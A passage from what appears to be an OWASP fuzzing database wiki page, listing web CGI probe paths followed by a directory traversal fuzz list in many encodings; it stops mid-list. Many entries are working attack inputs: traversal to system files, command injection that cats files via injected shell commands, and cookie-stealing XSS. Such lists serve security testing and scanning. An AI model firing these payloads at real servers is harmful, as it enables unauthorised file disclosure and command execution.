nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
